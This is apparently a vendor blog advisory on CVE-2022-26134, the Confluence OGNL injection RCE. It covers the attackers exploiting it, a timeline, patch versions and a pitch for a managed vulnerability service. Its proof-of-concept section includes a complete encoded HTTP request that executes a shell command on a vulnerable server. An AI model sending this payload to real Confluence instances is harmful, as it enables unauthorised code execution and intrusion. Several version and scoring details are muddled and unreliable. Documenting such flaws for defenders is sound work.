CVE-2022-26134: A New RCE Atlassian Bug Exploited by Ransomware Gangs
Posted on Jun 17, 2022 | By Prakash Ram
Did you know AvosLocker ransomware is now targeting unpatched Atlassian Confluence Server and Data Center instances?
Atlassian Confluence is a workspace that is used for documentation, decisions, project collaborations, and Jira integrations. A zero-day flaw was detected recently which affects Confluence server and data center products that can be remotely exploited by an attacker. This zero-day can be exploited by executing arbitrary code by a threat actor to deploy webshells to extract data. This web-based vulnerability has to be patched immediately as the system has limited logging or monitoring capabilities which means it is quite difficult to detect.
Our Cyber Threat Intelligence captured CVE-2022-26134 on Deep Dark Web discussions, indicating hackers are on the lookout for this vulnerability. In addition, this CVE was first spotted in hackers chatter on June 03, 2022, and has a high probability of exploitation.
Atlassian zero-day vulnerability that has been exploited in the wild is tagged as CVE-2022-26134. This is a critical unauthenticated, remote code execution vulnerability that affects all Atlassian Confluence and Data Center 2016 servers after version 1.3.0.
This bug was found by Volexity and reported on the last week of May while performing Incident Response over the weekend.
The CVSS V3 score of this vulnerability ranges from 9 to 10.
A proof-of-concept exploits for this flaw was publicly released.
Approximately 4000 instances of Atlassian Confluence were available worldwide in exploiting and testing for Atlassian Confluence CVE-2022-26134, according to a Tweet by Shadowserver.
A total of 23 IP addresses have exploited the Atlassian vulnerabilities.
Popular scanners such as Nessus and Tenable were able to detect this vulnerability
All supported versions of Confluence Datacenter and Server are affected by this flaw. Confluence and Datacenter versions after 1.3.0 are affected.
Current attackers of this CVE
Volexity believes this vulnerability is also exploited by multiple threat actors based in China.
Back in December 2021, Cerber had targeted Confluence servers in December 2021 using CVE 2021-26084 exploits and now researchers had found mass scans running on various networks to find exploitable Confluence versions.
A crypto mining group called the 8220 gang took advantage of this offering, by performing mass scans to find vulnerable Windows and Linux devices, according to CheckPoint.
Kinsing, Hezb, and Dark IoT are known for targeting vulnerable Linux servers running unpatched Atlassian Confluence Server and Data Center installs and deploying backdoors and cryptominers.
AvosLocker affiliates have begun exploiting this vulnerability by trying to infect computers on a big scale by targeting Internet-facing Confluence servers that haven't been patched.
The threat actors have created a Confluence campaign on the AvosLocker command and control server, which is shown below
Proof of Concept
Confluence Preauth RCE via OGNL Injection
The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. Following are steps to exploit via OGNL Injection.
Setup the vulnerable environment using docker-compose up -d.
Once the environment is set up, visit http://your-ip:8090 and an installation guide will pop up, select “Trial installation”, then fill up the license key. You can find the database configuration here.
By sending the following request to execute arbitrary commands OGNL injection is performed and a response is obtained
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
After successfully exploiting the Confluence data center systems, the attacker deploys a memory copy of the BEHINDER implant. Upon deployment, the attacker uses the in-memory webshell to deploy two additional webshells to disk namely CHINA CHOPPER and a custom upload file.
Using the above-mentioned custom webshell, an attacker can upload arbitrary files to the web server.
Network Indicators and Attributions
The following IP addresses have been used to attack the webshell and to mimic a legitimate internet user -
Do you use Confluence as part of the Atlassian Cloud and are worried about whether you are affected?
Do not worry as Atlassian says that if you access Confluence through the atlassian.net domain, your site is not vulnerable and there is currently no evidence that cloud sites have been targeted.
We strongly recommend organizations to update to the latest versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, and 7.18.1 to fix this issue, click here to download the PATCH!
31 May 2022: Volexity reported the findings.
31 May 2022: Atlassian confirmed the 0-day vulnerability.
31 May 2022: 8220 gang leveraged this vulnerability.
1 June 2022: Cerber Ransomware activities saw a spike.
2 June 2022: CISA released CVE 2022-26134 to KEV Catalog.
3 June 2022: Atlassian released security advisory.
10 June 2022: Microsoft has observed a spike in CVE-2022-26134 being exploited in the wild.
CSW’s Vulnerability Management as a Service (VMaaS) offers full coverage encompassing your entire IT landscape and detects, prioritizes, and fixes vulnerabilities on your organizational infrastructure, and provides access to the award-winning Risk-Based Vulnerability Management platform to view all your desired results in real-time.
To know more about CSW’s Vulnerability Management as a Service (VMaaS), Please click here
Never miss a patch or an update with CSW's Patch Watch Newsletter. Subscribe now!